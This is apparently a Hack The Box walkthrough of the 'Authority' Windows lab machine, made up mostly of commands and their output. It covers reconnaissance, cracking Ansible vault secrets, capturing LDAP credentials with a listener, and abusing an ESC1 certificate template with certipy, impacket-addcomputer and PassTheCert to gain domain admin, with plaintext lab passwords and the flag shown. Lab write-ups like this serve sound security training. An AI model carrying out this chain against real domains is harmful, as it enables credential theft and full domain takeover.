NMAP...
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-06 20:05 IST
Nmap scan report for 10.10.11.222
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-02-06 18:35:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
|_ssl-date: 2024-02-06T18:38:28+00:00; +3h59m59s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2024-02-06T18:38:26+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2024-02-06T18:38:26+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2024-02-06T18:38:26+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
8443/tcp open ssl/https-alt
|_http-trane-info: Problem with XML parsing of /evox/about
| fingerprint-strings:
| FourOhFourRequest, GetRequest:
| HTTP/1.1 200
| Content-Type: text/html;charset=ISO-8859-1
| Content-Length: 82
| Date: Tue, 06 Feb 2024 18:35:55 GMT
| Connection: close
| <html><head><meta http-equiv="refresh" content="0;URL='/pwm'"/></head></html>
| HTTPOptions:
| HTTP/1.1 200
| Allow: GET, HEAD, POST, OPTIONS
| Content-Length: 0
| Date: Tue, 06 Feb 2024 18:35:55 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 1936
| Date: Tue, 06 Feb 2024 18:36:02 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Invalid character found in the HTTP protocol [RTSP/1.00x0d0x0a0x0d0x0a...]</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid
|_http-title: Site doesn't have a title (text/html;charset=ISO-8859-1).
| ssl-cert: Subject: commonName=172.16.2.118
| Not valid before: 2024-02-04T18:33:56
|_Not valid after: 2026-02-06T06:12:20
|_ssl-date: TLS randomness does not represent time
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49687/tcp open msrpc Microsoft Windows RPC
49735/tcp open msrpc Microsoft Windows RPC
54336/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8443-TCP:V=7.94%T=SSL%I=7%D=2/6%Time=65C243CB%P=x86_64-pc-linux-gnu
SF:%r(GetRequest,DB,"HTTP/1\.1\x20200\x20\r\nContent-Type:\x20text/html;ch
SF:arset=ISO-8859-1\r\nContent-Length:\x2082\r\nDate:\x20Tue,\x2006\x20Feb
SF:\x202024\x2018:35:55\x20GMT\r\nConnection:\x20close\r\n\r\n\n\n\n\n\n<h
SF:tml><head><meta\x20http-equiv=\"refresh\"\x20content=\"0;URL='/pwm'\"/>
SF:</head></html>")%r(HTTPOptions,7D,"HTTP/1\.1\x20200\x20\r\nAllow:\x20GE
SF:T,\x20HEAD,\x20POST,\x20OPTIONS\r\nContent-Length:\x200\r\nDate:\x20Tue
SF:,\x2006\x20Feb\x202024\x2018:35:55\x20GMT\r\nConnection:\x20close\r\n\r
SF:\n")%r(FourOhFourRequest,DB,"HTTP/1\.1\x20200\x20\r\nContent-Type:\x20t
SF:ext/html;charset=ISO-8859-1\r\nContent-Length:\x2082\r\nDate:\x20Tue,\x
SF:2006\x20Feb\x202024\x2018:35:55\x20GMT\r\nConnection:\x20close\r\n\r\n\
SF:n\n\n\n\n<html><head><meta\x20http-equiv=\"refresh\"\x20content=\"0;URL
SF:='/pwm'\"/></head></html>")%r(RTSPRequest,82C,"HTTP/1\.1\x20400\x20\r\n
SF:Content-Type:\x20text/html;charset=utf-8\r\nContent-Language:\x20en\r\n
SF:Content-Length:\x201936\r\nDate:\x20Tue,\x2006\x20Feb\x202024\x2018:36:
SF:02\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><html\x20lan
SF:g=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20R
SF:equest</title><style\x20type=\"text/css\">body\x20{font-family:Tahoma,A
SF:rial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;background-
SF:color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size:16px;}\x
SF:20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{color:blac
SF:k;}\x20\.line\x20{height:1px;background-color:#525D76;border:none;}</st
SF:yle></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Re
SF:quest</h1><hr\x20class=\"line\"\x20/><p><b>Type</b>\x20Exception\x20Rep
SF:ort</p><p><b>Message</b>\x20Invalid\x20character\x20found\x20in\x20the\
SF:x20HTTP\x20protocol\x20\[RTSP/1\.00x0d0x0a0x0d0x0a\.\.\.\]</p><p><b
SF:>Description</b>\x20The\x20server\x20cannot\x20or\x20will\x20not\x20pro
SF:cess\x20the\x20request\x20due\x20to\x20something\x20that\x20is\x20perce
SF:ived\x20to\x20be\x20a\x20client\x20error\x20\(e\.g\.,\x20malformed\x20r
SF:equest\x20syntax,\x20invalid\x20");
Service Info: Host: AUTHORITY; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s
| smb2-time:
| date: 2024-02-06T18:38:11
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 169.18 seconds
SMB...
➜ Authority smbclient -L ////10.10.11.222//
Password for [WORKGROUP\nakul]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Department Shares Disk
Development Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.222 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
➜ Authority smbclient -N //10.10.11.222/Development
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Mar 17 18:50:38 2023
.. D 0 Fri Mar 17 18:50:38 2023
Automation D 0 Fri Mar 17 18:50:40 2023
5888511 blocks of size 4096. 1494600 blocks available
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
LDAP...
➜ Authority ldapsearch -H ldap://10.10.11.222 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=authority,DC=htb
namingcontexts: CN=Configuration,DC=authority,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=authority,DC=htb
namingcontexts: DC=DomainDnsZones,DC=authority,DC=htb
namingcontexts: DC=ForestDnsZones,DC=authority,DC=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
➜ Authority ldapsearch -H ldap://10.10.11.222 -x -s base namingcontexts
➜ Authority ldapsearch -H ldap://10.10.11.222 -x -b "DC=authority,DC=htb"
# extended LDIF
#
# LDAPv3
# base <DC=authority,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090ACD, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1
In smb Development share ->
/Automation/Ansible/PWM/defaults
➜ defaults cat main.yml
---
pwm_run_dir: "{{ lookup('env', 'PWD') }}"
pwm_hostname: authority.htb.corp
pwm_http_port: "{{ http_port }}"
pwm_https_port: "{{ https_port }}"
pwm_https_enable: true
pwm_require_ssl: false
pwm_admin_login: !vault |
$ANSIBLE_VAULT;1.1;AES256
32666534386435366537653136663731633138616264323230383566333966346662313161326239
6134353663663462373265633832356663356239383039640a346431373431666433343434366139
35653634376333666234613466396534343030656165396464323564373334616262613439343033
6334326263326364380a653034313733326639323433626130343834663538326439636232306531
3438
pwm_admin_password: !vault |
$ANSIBLE_VAULT;1.1;AES256
31356338343963323063373435363261323563393235633365356134616261666433393263373736
3335616263326464633832376261306131303337653964350a363663623132353136346631396662
38656432323830393339336231373637303535613636646561653637386634613862316638353530
3930356637306461350a316466663037303037653761323565343338653934646533663365363035
6531
ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |
$ANSIBLE_VAULT;1.1;AES256
63303831303534303266356462373731393561313363313038376166336536666232626461653630
3437333035366235613437373733316635313530326639330a643034623530623439616136363563
34646237336164356438383034623462323531316333623135383134656263663266653938333334
3238343230333633350a646664396565633037333431626163306531336336326665316430613566
3764%
I ll crack these hashes with ansible2john
➜ hash cat ldap_admin_password pwm_admin_login pwm_admin_password
$ANSIBLE_VAULT;1.1;AES256
633038313035343032663564623737313935613133633130383761663365366662326264616536303437333035366235613437373733316635313530326639330a643034623530623439616136363563346462373361643564383830346234623235313163336231353831346562636632666539383333343238343230333633350a6466643965656330373334316261633065313363363266653164306135663764
$ANSIBLE_VAULT;1.1;AES256
326665343864353665376531366637316331386162643232303835663339663466623131613262396134353663663462373265633832356663356239383039640a346431373431666433343434366139356536343763336662346134663965343430306561653964643235643733346162626134393430336334326263326364380a6530343137333266393234336261303438346635383264396362323065313438
$ANSIBLE_VAULT;1.1;AES256
313563383439633230633734353632613235633932356333653561346162616664333932633737363335616263326464633832376261306131303337653964350a363663623132353136346631396662386564323238303933393362313736373035356136366465616536373866346138623166383535303930356637306461350a3164666630373030376537613235653433386539346465336633653630356531
cat ldap_admin_password pwm_admin_login pwm_admin_password > john
john john --wordlist=/usr/share/wordlists/rockyou.txt
➜ hash john john --show
ldap_admin_password:!@#$%^&*
pwm_admin_login:!@#$%^&*
pwm_admin_password:!@#$%^&*
3 password hashes cracked, 0 left
➜ hash cat ldap_admin_password|ansible-vault decrypt
Vault password:
Decryption successful
DevT3st@123%
➜ hash cat pwm_admin_login|ansible-vault decrypt
Vault password:
Decryption successful
svc_pwm%
➜ hash cat pwm_admin_password|ansible-vault decrypt
Vault password:
Decryption successful
pWm_@dm!N_!23%
➜ hash
I ll try these creds on http
HTTP...
I ll add my IP as ldap url and listen for incoming connection using ncat.
Click on Test Ldap Profile and start nc listner
svc_ldap:htblDaP_1n_th3_cle4r!
I can get a shell using these credentials on the box, using evil-winrm.
ADCS...
I ll use certipy to find Misconfigured Certificate Templates
certipy-ad find -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -target authority.htb -text -stdout -vulnerable
--SNIP--
Write Property Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
[!] Vulnerabilities
ESC1 : 'AUTHORITY.HTB\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
I can add Domain computers, I ll add a computer using impacket-addcomputer
impacket-addcomputer 'authority.htb/svc_ldap:lDaP_1n_th3_cle4r!' -method LDAPS -computer-name hello
-computer-pass 'Password123!' -dc-ip 10.10.11.222
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Successfully added machine account hello$ with password Password123!.
Now I ll use certipy to create a certificate.
certipy-ad req -username 'hello$' -password 'Password123!' -ca AUTHORITY-CA -dc-ip 10.10.11.222 -template CorpVPN -upn administrator@authority.htb -dns authority.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 5
[*] Got certificate with multiple identifications
UPN: 'administrator@authority.htb'
DNS Host Name: 'authority.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator_authority.pfx'
➜ hash certipy-ad auth -pfx administrator_authority.pfx
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Found multiple identifications in certificate
[*] Please select one:
[0] UPN: 'administrator@authority.htb'
[1] DNS Host Name: 'authority.htb'
> 0
[*] Using principal: administrator@authority.htb
[*] Trying to get TGT...
^[[A^[[A^[[A
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
The above error can be fixed by using PassTheCert
https://github.com/AlmondOffSec/PassTheCert
For passthecert attack I need the key and the certificate in separate files
➜ hash certipy-ad cert -pfx administrator_authority.pfx -nocert -out administrator.key
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Writing private key to 'administrator.key'
➜ hash certipy-ad cert -pfx administrator_authority.pfx -nokey -out administrator.crt
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Writing certificate and to 'administrator.crt'
➜ hash python PassTheCert/Python/passthecert.py -action ldap-shell -crt administrator.crt -key administrator.key -domain authority.htb -dc-ip 10.10.11.222
Impacket v0.11.0 - Copyright 2023 Fortra
Type help for list of commands
# help
add_computer computer [password] [nospns] - Adds a new computer to the domain with the specified password. If nospns is specified, computer will be created with only a single necessary HOST SPN. Requires LDAPS.
rename_computer current_name new_name - Sets the SAMAccountName attribute on a computer object to a new value.
add_user new_user [parent] - Creates a new user.
add_user_to_group user group - Adds a user to a group.
change_password user [password] - Attempt to change a given user's password. Requires LDAPS.
clear_rbcd target - Clear the resource based constrained delegation configuration information.
disable_account user - Disable the user's account.
enable_account user - Enable the user's account.
dump - Dumps the domain.
search query [attributes,] - Search users and groups by name, distinguishedName and sAMAccountName.
get_user_groups user - Retrieves all groups this user is a member of.
get_group_users group - Retrieves all members of a group.
get_laps_password computer - Retrieves the LAPS passwords associated with a given computer (sAMAccountName).
grant_control target grantee - Grant full control of a given target object (sAMAccountName) to the grantee (sAMAccountName).
set_dontreqpreauth user true/false - Set the don't require pre-authentication flag to true or false.
set_rbcd target grantee - Grant the grantee (sAMAccountName) the ability to perform RBCD to the target (sAMAccountName).
start_tls - Send a StartTLS command to upgrade from LDAP to LDAPS. Use this to bypass channel binding for operations necessitating an encrypted channel.
write_gpo_dacl user gpoSID - Write a full control ACE to the gpo for the given user. The gpoSID must be entered surrounding by {}.
exit - Terminates this session.
Add_user_to_group looks juicy.
add_user_to_group svc_ldap administrators
Adding user: svc_ldap to group Administrators result: OK
I ll reconnect to evil-winrm as svc_ldap user.
*Evil-WinRM* PS C:\users\administrator\Desktop> net user svc_ldap
User name svc_ldap
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 8/10/2022 8:29:31 PM
Password expires Never
Password changeable 8/11/2022 8:29:31 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/5/2023 7:43:09 PM
Logon hours allowed All
Local Group Memberships *Administrators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
I have local group membership of administrator
*Evil-WinRM* PS C:\users\administrator\Desktop> dir
Directory: C:\users\administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/6/2024 1:34 PM 34 root.txt
*Evil-WinRM* PS C:\users\administrator\Desktop> type root.txt
7b0acc82bbbed94c0da63bdaa810ee96
*Evil-WinRM* PS C:\users\administrator\Desktop>